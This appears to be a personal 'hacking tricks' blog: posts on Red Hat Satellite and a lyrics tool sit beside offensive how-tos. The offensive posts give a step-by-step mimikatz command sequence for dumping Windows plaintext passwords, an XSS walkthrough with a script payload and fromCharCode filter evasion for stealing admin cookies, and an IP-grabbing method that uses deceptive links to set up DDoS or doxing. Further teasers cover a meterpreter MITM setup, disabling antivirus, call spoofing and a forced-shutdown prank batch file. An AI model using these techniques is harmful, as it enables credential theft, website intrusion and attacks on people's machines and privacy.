Thursday, 30 June 2016

Red Hat Satellite [Introduction]

Introduction



Red Hat satellite is an open source system management tool , that can manage the Product life-cycle environment in production.

It allows administrators to directly deploy resources or content in the product life cycle Stage eg: Development,QA etc

Red Hat Satellite is based on upstream project TheForeman and katello. It also consists of puppet for config management, pulp is responsible for content storage and management.

So , in brief ,we could say that Red Hat satellite is life cycle management tool , with provisioning capabilities and integrated config management.

To this day , Satellite 6.1.9 is the major release, with beta 6.2

Satellite also encompasses some useful plugins which are helpful in Hosts management , and auditing some of the plugins are :


  • OSCAP - The OpenSCAP ecosystem provides multiple tools to assist administrators and auditors with assessment, measurement and enforcement of security baselines. We maintain great flexibility and interoperability, reducing costs of performing security audits.
  • Discovery Plugin -The satellite is not only capable of provisioning hosts , but can also discover the hosts directly from the specified subnet and later provision them. (Also capable of Bulk Provision)
  • foreman_templates- When the provisioning is done , we can pre-defined , what the satellite should do next with those provisioned hosts, this can be written in the form of scripts and stored as Provisioning templates , where we can handle the settings while doing provisioning , this provides flexibility, to customize provisioning according to need.  
  • Katello - katello is another open source project , which helps in content management. It helps to provide hosts content and mimic the traditional environment path (Dev → QE → Stage → Production)
  • Remode Code Execution- This features lets user , run commands on to the hosts diresclty , currently it it uses ssh to do so , but the plan is to add more communication providers. Communication goes through the smart proxy so Foreman does not have to have direct access to the target host and can scale to control many hosts. A command can be customized similarly to provisioning templates.
There are some of many features , that are used very often and makes this tool different from the traditional bunch.


The another feature that interesting is The Provisioning part : 

Red Hat Satellite supports all major Providers except Azure (soon to change), the provisioning on these resources is automatically done via Satellite ,and with similar settings and users don't have to provide , provider specific settings. Satellite creates a extra layer of abstraction between the user and providers. 
These providers are considered as Compute resources in satellite.

Once the computer resource of any type is added , user has to go to new host page and specifiy the compute resource to deploy host and this would be similar for all providers.

Red Hat Satellite is still gaining it's pace and continuously growing by the hour , it is slowly changing the  traditional approaches for life cycle Management and content management.

Friday, 6 May 2016

SQL Injection

What is Sql Injection:

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

This guide is For Educational purposes Only.Please don't Misuse It

Step-by-Step tutorial for SQL Injection


Receive SMS Online Without Cell Phone

In This Tutorial we are gonna fix the activation problems That we come across while authenticating or completing surveys , There is a solution to receive sms Online , There is a websites that provides you with cell phone number and the text sms are received on the number online on website .
Features:
Just Pick up a number from the website.
Can do this multiple TimesUsage Unlimited Times
http://cur.lv/10ylj

No Need to register
Number selection choices
Just visit this link , wait for few seconds and skip ads

Saturday, 17 August 2013

Getting meterpreter session over MITM Attack [Study Only]


Hello , I wanna share an interesting technique By which we would get a meterpreter Session Over a MITM in a very easy way.


Tools:
1. Ubuntu [Recommended Kali]
2. Subterfuge [Download Here]
3. Armitage/Metasploit

Now We are familiar with armitage and ubuntu.

What is Subterfuge?

Subterfuge is an automated Man In The Middle Attack Framework. Subterfuge is a web based tools that can run smoothly using ur localhost system without installing webserver (it is included in the installation software). It is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol.


Host Machine = windows 7 
Victim Machine = Windows xp 
Exploit Machine = Kali 

Thursday, 20 June 2013

Mp3 Tagger [Get Lyrics of songs Hindi/English] -Custom Coded

This Software lets you find Lyrics Of the songs that you have on Your PC and where-ever on the web

Features
  • Display scrolling lyrics, you can follow along with the artist and catch every word.
  • Automatically search and download lyrics.
  • Huge lyrics database, and it is expanding every day.
  • No need To register 
  • Easy to setup and install
  • User Friendly , simple user-interface 

Yet to come :
  • I will add features to save lyrics 
  • The software will work offline 
Any suggestions are welcome , Report Bugs To me .


Tuesday, 4 June 2013

Extarct Windows System Password [mimikatz]

How you will feel if you get your windows operating system password in plain text.Is it possible?Yes,we can do it
Steps:
1) Download this file from any one of the following link.

 http://cur.lv/1159l
 2) Extract it to a new folder,then navigate to this path "mimikatz_trunk-->alpha-->win32 or x64" (Choose your bit)

3) Select that "mimikatz.exe",then right click on it and click "Run as Administrator" (You must run that file with Administrator Rights)

4) Type "privilege::debug" without quotes and press enter,you will get some command as Privilege '20' OK

5) Then type "sekurlsa::logonpasswords" and press enter.Now you will get your system usernames and passwords in plain text.




Monday, 3 June 2013

Get IP Address Effective Methods 4+

In this tutorial we're going to have a look at how you can gain someone's IP address.

What can I do with someones IP address?

Most people trace people's IP addresses to (D)DoS them. You will need to fill out the persons IP address to do so. Another reason can be that you want to make a complete DoX (Documentation) of a person, or maybe you just want to do a whois search on the IP. There are plenty of things you can do with gaining someones persons IP address.

The URL method:

This is the most easy way to do in a normal situation but it will require some social engineering. You will need to send your victim a link to a website which will then log the IP address of the person who visited that particular link and send hes IP address to you. When the victim visits the link it will turn into a 404 page (there are multiple websites that offer this service, the one we are going to use will result into a 404). This way it's less likely he'll be suspicious. After the link was clicked you will be send the IP address of your victim via mail (again, varies by website).

Tuesday, 13 November 2012

How To Trace an Email

Generally, the path taken by an email while traveling from sender to receiver can be explained by following diagram.




Step 1:-So here is the method of tracing the exact location from the email sent.I am showing the email tracing on gmail here but yahoo and other mail providing services have same concept. Step 1:-First open up your email account and click on your inbox.

Saturday, 13 October 2012

Change Start Button





To Get this In Your computer Follow The Exact Steps below

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executable and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from http://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

Sunday, 19 August 2012

Free Vpn LifeTime



TO SEE ON HOW TO SETUP AN VPN
             (Skip The ads)
Refer: http://cur.lv/4gpa  
            http://cur.lv/4gpc
            http://cur.lv/4gpd 
    
  Features of Free Canada VPN

2Mbit/s dedicated high speed internet connection from premium Canada data center for each VPN session, up to 50Gbps total bandwidth to world;
Encrypts and compresses all web browsing traffic;
Bypasses local ISP's traffic shaping and websites blocking;
Hiding online tracks from internet sniffing & web filtering system Websense;
No logs, No traces, no any VPN activities history saved in our VPN side;
Your real internet IP is hidden when using our VPN service;
Working with Microsoft Windows XP/Vista/7, Apple Mac OSX, Linux Ubuntu, iPhone, iPad, Google Android, WM65 and most network appliances;


VPN account information:

PPTP VPN Server Hostname: freecanadavpn.com
PPTP VPN Encryption Mode: Auto
PPTP VPN Username: free
PPTP VPN Password: (visit http://cur.lv/4gpi) (Skip The ad)
<check top right corner> The password will Change daily to avoid abuse of vpn


                                              (Skip The ad)
For more VPN servers visit: http://cur.lv/4gph

Introduction To XSS

                  Introduction To XSS


What is XSS ???
Cross-site scripting holes are web-application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern web browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based.

Lets Begin!!

The Vulnerabilty UrL:

http://www.xxx.xx/forum/search.php?id=yyyy
http://www.xxx.xx/xxxx/xxxxxx.php?xx=&yy=yy

Here,yy is the place u can put Your script for execution
or
http://www.xxx.xx/forum/?page_id=&5infor...user=admin

It can be any url which can submit u r query to the server to execute u script...

Firstly you need to register into the victim website so that u can get permission to post and place comments...if you can do the search and comment without register itz ok but often you will need to register and place your scripts to record the cookies
To the Example:
The Hack :::::::::::::

The Url:
Quote:
http://www.xxx.xx/forum/search.php?id=yyyy

now we will replace the 'yyy' in the example with a script to check whether it is vulnerable to xxs or no

 The script

<script>alert("TEST")</script>

You can find the huge list of scripts to check whether the websites whether they are vulnerable to xss.
Here:http://leethacks.net/thread-1015.html

If you get a popup on you screen "Test" after executing this..
Then the website is vulnerable to xxs!!
But we need to find the scource and if the scource contains your script the u are on!!!
The code of your script might be changed in the scource the quotes might have filtered or altered but that doesnt matter....we are gonna use
Congrats Now we can try to get admin cookies

Now we are using the String.fromCharCode option.

http://www.wocares.com/noquote.php

Select Javascript (String.fromCharCode, unescape)

Type in "TEST" and we get this:

Code:

String.fromCharCode(116,101,115,116)

Okay now replace this with "\TEST\"
So our adress should now looks like this:

Code:

value=''/><script>alert(String.fromCharCode(116,101,115,116)</script>

Okay after we have done this go back to the first page where you selected the posts of the admin and replace admin again, but now with our new results !
It should look like
Code:
http://www.xxx.xx/xxx/search.php?id='/%3Cscript%3Ealert(String.fromCharCode(116,101,115,116)%3C/script%3E

Congrats you sucessfully hacked a website with XSS !
Now you can search for cookies !
Just use the same method as before !

Getting Free Domains and Hosting

                      How to get FREE Domains + Hosting 

I recommand you to have the following programs:
– Google Chrome (for translating the website)
https://www.google.com/chrome/

– HideMyIP (or any else IPHider) http://hide-my-ip.com/

Before you are starting please check all my tips!
– Use HideMyIP or any iphider.
– Clear your cookies.
– Never use your personal email.
– Logon your FTP every month so it will keep active.

I put here a list of downloads and links for you.
Hotmail  www.hotmail.com
Mijndomein  http://cur.lv/11ft8

Step 1:
Create a hotmail account. Link above

Wednesday, 6 June 2012

`Hacking Telenet And FTP




INTRODUCTION:

A little background is needed before we get into hacking techniques.

When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually give you access to all of Fred’s services - his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.

Friday, 13 April 2012

[BASIC]Hacking Windows XP


[TUT][BASIC]Password Override on Windows XP[TUT]

Today I am going to give out an old but very important technique for changing passwords.

NOTE: I DO NOT TAKE ANY RESPONSIBILITY FOR ACTIONS OF END USERS IF THIS GUIDE IS MISUSED. IF YOU DO YOU WILL BE ON YOUR OWN
Here we go:

[TUT] Call Spoofing [TUT]



[TUT] Call Spoofing [TUT]




Did you ever wanted to call your friends with someone else's mobile number? If yes you are at the right thread.


Note: It is only for educational purpose. I don't take any responsibility of user actions for illegal actions. If you do so you will be on your own.


Here are steps:

Disabling All Antiviruses

Disabling all antiviruses
Sometimes, you could get BSOD, and many times it's due to antivirus installed on system.
The below batch program helps you to disable all the running antivirus in the system. Just save copy and paste it in notepad file and save it with .bat extension.

Saturday, 24 September 2011

Trace Emails

Many times you get fake emails and wanna know about the person who send you this email. It possible to find out origin of the EMAIL. The only thing you need to know is how to get email message header. Just copy the message header and paste it to the tracker system. And it will give you the location of the email sender's IP address.Trace-mail   

Trace Mobile Number,Vehical Number etc.

Many people want this type of services and searched over internet a waste their time but unable to get desired results.
A few days ago i got a website which have a lots of tracing services. It shows tracing results in a map along with all suitable information you want to know.

Saturday, 17 September 2011

How To Disable The Keyboard Using Batch Script

How To Disable The Keyboard Using Batch Script

Just copy and paste the code below in notepad and save it as “anything.bat”. What it exactly does is modifies the registry value of keyboard layout of each keys and finally disabling all the keys.

Ten Great Scripts to Trick your Friends - Simple yet Freaky!!!

 Ten Great Scripts to Trick your Friends - Simple yet Freaky!!!

Here are some cool freaky tricks to prank your friends. Just type the given code or copy and paste it in Notepad and save it accordingly.

1) Display a Small message and then shut down his / her computer :
    TYPE THIS CODE :
    Code:
    @echo off
    msg * I don't like you
    shutdown -c "Error! You are too stupid!" -s
    Save it as "Anything.BAT" in All Files and send it.